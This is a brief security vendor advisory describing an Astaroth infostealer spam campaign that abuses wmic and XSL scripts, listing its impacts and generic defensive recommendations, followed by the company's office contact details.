LTS Secure Warning: New Mal-Spam Campaign Identified Delivering Infostealer.Astaroth With Advanced Evasion Techniques

A new version of the Astaroth malware has surfaced again & is making use of native microsoft tools to evade common security solutions. Attackers are making use of Mal-Spam campaigns to target mostly users in Brazil & European countries.

 

Technical Details

The trojan makes it way on the compromised computer via .zip file contained in spam email. Once the .zip is downloaded & extracted, it presents an .lnk file, that upon pressing start the infection process. The process makes use of wmic.exe to initialize a XSL script processing attack. This allows the malware to communicate with a remote C&C server & send sensitive/personal information from the infected machine to attacker.

The XSL file additional consists of highly obfuscated code that has the ability to execute further malicious activity & assists the malware from being hidden from anti-viruses.

 

Impact

  • Logs user’s keystrokes.
  • Prevents operating system calls.
  • Gather information saved to the clipboard.
  • Steal sensitive/confidential information like login credentials of banking sites, cookies, etc.

 

Recommended Actions

  • Never download any suspicious attachments or click on any shady-looking link.
  • Take an effort to educate your users on how to identify a mail-spam.
  • Try to avoid downloading and using any Freeware application.
  • Always update your anti-virus software with the latest releases.
  • Run a periodic Full system scan.

 

LTS Secure Locations
  • Florida: 407-965-5509
    Los Angeles: 323-544-5013
    Mid West: 800 689 4506

  • Chicago/Midwest– 2406 Schumacher Drive, Mishawaka, IN, 46545

    201, Tower S4, Phase II, Cybercity, Magarpatta Township, Hadapsar, Pune-411013